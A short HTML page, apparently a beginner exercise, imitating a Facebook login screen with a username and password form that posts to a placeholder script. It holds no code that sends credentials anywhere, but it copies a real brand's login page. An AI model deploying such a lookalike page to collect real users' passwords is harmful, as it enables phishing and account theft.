<html>
<head>
	<style>
		input[type=text] {
 		width: 100%;
  		padding: 12px 20px;
  		margin: 8px 0;
  		display: inline-block;
  		border: 1px solid #cccccc;
  		border-radius: 10px;
  		box-sizing: border-box;
		}
		input[type=password] {
			width:100%;
			padding:12px 20px;
			margin:8px 0;
			display:block;
			border: 1px dotted #cccccc;
			border-radius:10px;
			box-sizing:default;
		}
		h1{
			background-color:#067dda;
			color:white;
		}
		.center{
			display:inline;
			margin-left:5px;
			margin-top: 5px;
			margin-right:2px;
			margin-bottom:0;

		}

	</style>
<body>
	<h1><img src="f.jpg" height="25px" width="25px" class="center">Welcome to facebook</h1>
	<form name="login" action="/action_page.php" mmethod="get">
		Username<input type="text" name="User name">
		Password<input type="password" name="Password">
		<input type="submit">
		<a href="forgot.html">Reset</a>
	</form> 
</body>
</html>